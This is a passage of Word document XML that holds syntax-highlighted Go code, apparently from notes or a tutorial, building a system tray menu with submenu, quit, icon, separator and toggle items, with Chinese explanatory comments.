          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"SubMenu Test (bottom) - Hide/Show Panic!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">subMenuBottom2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>subMenuMiddle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddSubMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"SubMenuBottom - Panic!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"SubMenu Test (bottom)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">mUrl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Open UI"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"my home"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">mQuit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Quit the whole app"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>// Sets the icon of a menu item. Only available on Mac.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// SetTemplateIcon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> SetIcon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>无明显区别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mQuit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetIcon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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lastRenderedPageBreak/>
        <w:br/>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>仅在托盘菜单中添加分割线，仅美观作用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddSeparator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">mToggle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Toggle"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Toggle the Quit button"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>从写法上看，为了下面托盘的执行部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>部分的代码简洁美观，此处定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> toggle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>为一个匿名函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>此处设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>勾选框为勾选或者取消勾选、菜单隐藏或显示</w:t>
      </w:r>
      <w:r>
